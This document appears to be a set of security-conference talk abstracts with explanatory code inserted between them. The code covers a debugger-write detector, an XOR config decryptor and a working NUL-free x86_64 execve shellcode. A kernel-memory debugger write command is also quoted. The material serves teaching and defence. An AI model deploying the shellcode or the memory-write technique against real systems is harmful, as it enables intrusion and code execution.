Hackers look for the easiest path to the greatest impact. When it comes to credit card fraud, compromising Point of Sale (PoS) systems is the latest trend. The presenters will share their experience of how attackers exploit both technical and policy gaps to breach organizations. This talk will cover approaches to physical security, kiosk breakouts, and the extraction of sensitive data. It is laced with real-life examples, including a detailed discussion of recently disclosed critical vulnerabilities in Oracle’s hotel management platform.
BearSSL is a novel SSL/TLS library optimised for constrained systems, aiming at a small code footprint and low RAM usage. The talk presents the library in its context and delves into what makes a good SSL implementation and how BearSSL achieves it.
For this talk, a criminologist and a security researcher teamed up to hunt a large-scale botnet dubbed Linux/Moose that conducts social media fraud. Linux/Moose has stealth features and runs only on embedded systems such as consumer routers or Internet of Things (IoT) devices. Using honeypots set up across the world, we managed to get virtual routers infected in order to learn how this botnet spread and operated. We performed a large-scale HTTPS man-in-the-middle attack on several honeypots over the course of several months, decrypting the bots’ proxy traffic. This gave us an impressive amount of information on the botnet’s activities on social networks: the names of the fake accounts it uses, its modus operandi for conducting social media fraud, and the identification of its consumers, both companies and individuals.
This presentation will be of interest to a wide audience. First, it will present the elaborate methodology we used to infect custom honeypots with Linux/Moose, which led to contributions to the open-source Cowrie Honeypot Project. Second, it will describe the technical details behind the man-in-the-middle attack conducted to decrypt the traffic. The talk will further widen its appeal by placing the botnet’s activities within a larger scope: the illicit market for social media fraud. With the data gathered from the decrypted traffic and open-source research, the market dynamics behind the sale of social media fraud will be presented, giving an overview of the botnet’s potential profitability. Overall, this research raises the standard of botnet studies, as it investigates not only how a botnet is built, but also what drives it.
Imagine being attacked with legitimate software tools that the usual defensive tooling cannot detect.
How bad could it get if a threat actor only had to send bytes to be read and bytes to be written in order to carry out advanced attacks?
The most dangerous threat is the one you can’t see. At a time when memory attacks that go through APIs like VirtualAlloc are already not obvious to detect, what would be worse than having to detect something like “f 0xffffe001`0c79ebe8+0x8 L4 0xe8 0xcb 0x04 0x10” (a debugger fill-memory command that writes four bytes at a kernel-mode address)?
We will demonstrate that we can achieve every kind of attack you can imagine using only PowerShell and a Microsoft-signed debugger. We can retrieve passwords from userland memory, execute shellcode by dynamically parsing a loaded PE, or attack the kernel, achieving advanced persistence inside any system.
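As an added illustration (not part of the talk, and not the presenters' tooling), here is a small Python filter over a constructed debugger command transcript: it decodes the `f` (fill memory) and `eb` (enter bytes) commands, resolves the address expression, and flags writes that land in the kernel half of the x64 address space or that start with a CALL/JMP rel32 opcode. The transcript lines, the kernel-range threshold and the note strings are this example's assumptions.

```python
import re
from dataclasses import dataclass, field

# Constructed transcript of debugger commands (cdb/kd style), assumed captured from a
# script file or console log. Not from the talk; the values are illustrative only.
SAMPLE_COMMANDS = [
    "f 0xffffe001`0c79ebe8+0x8 L4 0xe8 0xcb 0x04 0x10",  # fill 4 bytes at a kernel address
    "eb 00007ff6`1234abcd 90 90 90 90 90",                 # enter bytes into user-mode code
    "db 0xffffe001`0c79ebe8 L10",                         # read-only, not flagged
    "!process 0 0",                                       # extension command, ignored
    "f 0x00000000`00401000 L2 0xcc 0xcc",                 # INT3 patch in user space
]

# Assumption: Windows x64 layout, where kernel-mode addresses live in the upper canonical half.
KERNEL_SPACE_START = 0xFFFF_8000_0000_0000

# WinDbg numbers default to hex; a backtick separates the high and low 32 bits of a 64-bit value.
FILL_RE = re.compile(r"^\s*f\s+(?P<addr>\S+)\s+L(?P<len>[0-9a-fA-F]+)\s+(?P<bytes>.+?)\s*$", re.I)
ENTER_RE = re.compile(r"^\s*eb\s+(?P<addr>\S+)\s+(?P<bytes>.+?)\s*$", re.I)


@dataclass
class MemoryWrite:
    command: str
    kind: str          # "fill" (f) or "enter" (eb)
    address: int       # resolved target address
    size: int          # number of bytes written
    pattern: bytes     # bytes supplied on the command line
    kernel: bool       # True if the address is in the kernel half
    notes: list = field(default_factory=list)


def parse_address(expr: str) -> int:
    """Resolve a simple address expression: hex terms joined by '+', backticks allowed."""
    return sum(int(term, 16) for term in expr.replace("`", "").split("+"))


def parse_bytes(tokens: str) -> bytes:
    values = [int(tok, 16) for tok in tokens.split()]
    if any(not 0 <= v <= 0xFF for v in values):
        raise ValueError(f"byte value out of range in {tokens!r}")
    return bytes(values)


def is_kernel_address(addr: int) -> bool:
    return addr >= KERNEL_SPACE_START


def analyze(commands):
    """Return one MemoryWrite per memory-modifying command; read and extension commands are skipped."""
    findings = []
    for cmd in commands:
        m = FILL_RE.match(cmd)
        if m:
            pattern = parse_bytes(m["bytes"])
            w = MemoryWrite(cmd, "fill", parse_address(m["addr"]), int(m["len"], 16), pattern, False)
        else:
            m = ENTER_RE.match(cmd)
            if not m:
                continue
            pattern = parse_bytes(m["bytes"])
            w = MemoryWrite(cmd, "enter", parse_address(m["addr"]), len(pattern), pattern, False)
        w.kernel = is_kernel_address(w.address)
        if w.kernel:
            w.notes.append("write lands in kernel-mode address range")
        if pattern[:1] in (b"\xe8", b"\xe9"):
            w.notes.append("pattern starts with CALL/JMP rel32 opcode (0xE8/0xE9): possible inline hook")
        if pattern[:1] == b"\xcc":
            w.notes.append("pattern starts with INT3 (0xCC): breakpoint or code patch")
        findings.append(w)
    return findings


if __name__ == "__main__":
    for w in analyze(SAMPLE_COMMANDS):
        print(f"{w.kind:5} {w.address:#018x} {w.size:3d} bytes  {w.pattern.hex()}  {'; '.join(w.notes)}")
```

The point of the filter is that the write itself carries no API name to hook: the only signal is the command text, so anything that logs debugger scripts or console input (or the debugger's own command history) is the place to look. The `L4` length is parsed as hex because that is the debugger's default radix.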
As banking fraud researchers, we take part in a never-ending chase after new configurations of banking malware. We strive to keep the upper hand by figuring out where the configurations are hidden and how they are encrypted. It can be quite thrilling when a new version of the malware is released, the encryption has changed, and the configuration must be decrypted before time runs out. We would like to share this thrill and teach useful skills that may come in handy when dealing with the variety of custom encryption algorithms used by malware authors. In many cases, cracking an encryption scheme requires advanced skills in math and reverse engineering. But quite often malware authors create custom algorithms for data formatting and encryption, which can be overcome with a more intuitive skill set and methods. A great example is the encryption used by Dridex, which we shall use as a case study. In this workshop, lecturing will be kept to the necessary minimum, and the major part will be dedicated to a hands-on, guided process of analyzing raw encrypted data. We shall study the way it is encrypted, eventually formulating a simple method of decryption. Participants will gain an understanding of the process of researching an actual encryption method, acquire basic tools for addressing encrypted data of unknown format, and enjoy the thrill of a live challenge.
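An added example, not the workshop's material and not Dridex's scheme: a constructed config-like XML blob is encrypted under a hypothetical 4-byte repeating XOR key, and the code below applies the kind of intuitive method the abstract alludes to. It measures entropy to confirm the blob is not plaintext, then drags a known-plaintext crib across it; at the right offset the XOR of ciphertext and crib is the key stream, whose period gives the key length. The key, the plaintext and the crib are all constructed for this example.

```python
import math
from collections import Counter

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, used here both to build the sample and to decrypt."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed sample: a config-like XML blob under a hypothetical 4-byte repeating XOR key.
# Neither the format nor the key is Dridex's; they stand in for "raw encrypted data of unknown format".
SAMPLE_KEY = bytes([0x13, 0xA7, 0x5C, 0xE0])
SAMPLE_PLAINTEXT = (
    b'<settings version="4">\n'
    b'  <server>https://198.51.100.23:443/cfg</server>\n'
    b'  <server>https://203.0.113.9:8443/cfg</server>\n'
    b'  <inject target="bank.example/login" script="inject.js" />\n'
    b'</settings>\n'
)
SAMPLE_CIPHERTEXT = xor_repeating(SAMPLE_PLAINTEXT, SAMPLE_KEY)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; roughly 4-5 for text, close to 8 for strong ciphertext or compressed data."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    return sum(b in PRINTABLE for b in data) / len(data)


def minimal_period(stream: bytes):
    """Smallest p such that the stream repeats every p bytes, or None if it does not repeat."""
    for p in range(1, len(stream) // 2 + 1):
        if all(stream[i] == stream[i + p] for i in range(len(stream) - p)):
            return p
    return None


def recover_xor_key(ct: bytes, crib: bytes, min_ratio: float = 0.95):
    """Crib-drag: at the true offset, ct XOR crib is the key stream, which repeats with the key length.
    Returns (key, offset, plaintext) for the first offset whose key decrypts to mostly printable data."""
    for off in range(len(ct) - len(crib) + 1):
        stream = bytes(c ^ p for c, p in zip(ct[off:off + len(crib)], crib))
        period = minimal_period(stream)
        if period is None:
            continue
        # Rotate so that key[i] is the byte applied at ciphertext index i.
        key = bytes(stream[(i - off) % period] for i in range(period))
        pt = xor_repeating(ct, key)
        if printable_ratio(pt) >= min_ratio:
            return key, off, pt
    return None


if __name__ == "__main__":
    print(f"entropy: plaintext {shannon_entropy(SAMPLE_PLAINTEXT):.2f}, "
          f"ciphertext {shannon_entropy(SAMPLE_CIPHERTEXT):.2f}")
    key, off, pt = recover_xor_key(SAMPLE_CIPHERTEXT, b"<server>https://")
    print(f"key {key.hex()} recovered from crib at offset {off}")
    print(pt.decode())
```

The crib must be at least twice the key length for the period to show; in practice a URL scheme, an XML tag or a known magic value serves. The printable-ratio check is the backstop that rejects an accidental periodic stream at a wrong offset.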
This workshop is a hands-on introduction to the basic exploitation techniques for scripting engines. The exercise focuses on real-world examples around mruby, a lightweight Ruby interpreter that is easily customizable to limit or completely remove I/O operations and act as a sandbox. Through successful exploitation, participants will be able to execute arbitrary native code from a Ruby script, bypassing any restrictions on the Ruby APIs.
Participants will be guided to look for common vulnerability patterns, set up their exploit, and ultimately gain control of the instruction pointer to escape the mruby virtual machine. Finally, some defensive measures will be presented to harden the vulnerable engine and limit the side effects of a successful exploit.
The workshop will begin with an overview of the various detection and automation mechanisms available in LimaCharlie.
Afterwards, we will create Detections and Hunters for LimaCharlie that automate the detection and investigation of specific malware samples (samples are provided for the workshop; attendees can also bring their own).
The purpose of this workshop is to familiarize participants with assembly language. At the end of the workshop, participants will be able to understand shellcode and optimize it to avoid null bytes or blacklisted characters.
The workshop will cover the basics of x86_64 assembly using Intel syntax.
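An added example, not part of the workshop: the byte sequences below are hand-assembled x86_64 encodings (Intel syntax in the comments) written for this illustration, and the checker is this example's own. It places a naive fragment whose immediates carry NUL bytes beside a NUL-free `execve("/bin//sh")` equivalent (Linux x86_64 is an assumption; the workshop does not name a platform) and reports every blacklisted byte with its offset, which is the check one runs before handing shellcode to a string-based loader.

```python
# Hand-assembled x86_64 encodings (Intel syntax in the comments), constructed for this example.
# Naive way to load the execve syscall number and zero two registers: each imm32 carries NUL bytes.
NAIVE_FRAGMENT = bytes([
    0x48, 0xC7, 0xC0, 0x3B, 0x00, 0x00, 0x00,   # mov rax, 0x3b
    0x48, 0xC7, 0xC6, 0x00, 0x00, 0x00, 0x00,   # mov rsi, 0
    0x48, 0xC7, 0xC2, 0x00, 0x00, 0x00, 0x00,   # mov rdx, 0
])

# NUL-free execve("/bin//sh", NULL, NULL) for Linux x86_64 (assumed platform). The doubled slash
# pads the path to exactly 8 bytes so the imm64 needs no NUL, and the pushed zero in rsi terminates it.
EXECVE_SHELLCODE = bytes([
    0x48, 0x31, 0xF6,                                            # xor rsi, rsi      ; argv = NULL
    0x56,                                                        # push rsi          ; string terminator
    0x48, 0xBF, 0x2F, 0x62, 0x69, 0x6E, 0x2F, 0x2F, 0x73, 0x68,  # mov rdi, "/bin//sh" (little-endian imm64)
    0x57,                                                        # push rdi
    0x48, 0x89, 0xE7,                                            # mov rdi, rsp      ; rdi -> "/bin//sh"
    0x48, 0x31, 0xD2,                                            # xor rdx, rdx      ; envp = NULL
    0x31, 0xC0,                                                  # xor eax, eax      ; clear rax first
    0xB0, 0x3B,                                                  # mov al, 0x3b      ; SYS_execve, no NULs
    0x0F, 0x05,                                                  # syscall
])

# Typical blacklist for string-copy sinks: NUL, LF, CR. Extend per target (e.g. 0x20, 0x2F).
DEFAULT_BADCHARS = frozenset({0x00, 0x0A, 0x0D})


def find_bad_bytes(code: bytes, badchars=DEFAULT_BADCHARS):
    """Return (offset, value) for every byte of `code` that is in the blacklist."""
    return [(i, b) for i, b in enumerate(code) if b in badchars]


def report(code: bytes, badchars=DEFAULT_BADCHARS) -> str:
    hits = find_bad_bytes(code, badchars)
    if not hits:
        return f"{len(code)} bytes, clean"
    return f"{len(code)} bytes, {len(hits)} bad: " + " ".join(f"{v:#04x}@{i}" for i, v in hits)


def to_c_literal(code: bytes) -> str:
    """Format as a C string literal for dropping into a test harness."""
    return '"' + "".join(f"\\x{b:02x}" for b in code) + '"'


if __name__ == "__main__":
    print("naive:     ", report(NAIVE_FRAGMENT))
    print("optimized: ", report(EXECVE_SHELLCODE))
    print(to_c_literal(EXECVE_SHELLCODE))
```

The substitutions are the standard ones: `xor reg, reg` instead of `mov reg, 0`, `mov al, imm8` on a cleared rax instead of `mov rax, imm32`, and an 8-byte path built by doubling a slash so the immediate has no padding. Run the checker with the target's own blacklist, since a 0x2F-free requirement would send this particular path encoding back to the drawing board.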
Integrating vulnerability scanning results into one’s security ecosystem involves a serious hidden challenge that can have heinous consequences and kill your InfoSec program. This session shares clues to this challenge, step by step, in the form of a murder mystery game, and ultimately reveals the culprit as well as strategies to overcome it. Come participate, play, and interact! Try to guess “whodunnit,” and learn how to avoid similar InfoSec crimes in the future.
Who said that you need to be elite to be a good red teamer?
This presentation focuses on simple, easy hacks that can change the result of a red team assessment.
This 30-minute talk will cover improvements on the age-old classic of dropping USB keys (a 35% increase in payload delivery!), how to reduce your C&C discoverability, techniques for leveraging Outlook against your victim to improve social engineering, and other very simple tricks. By the end of the presentation, the audience should be inspired to build upon the techniques discussed and feel more confident in conducting red team engagements.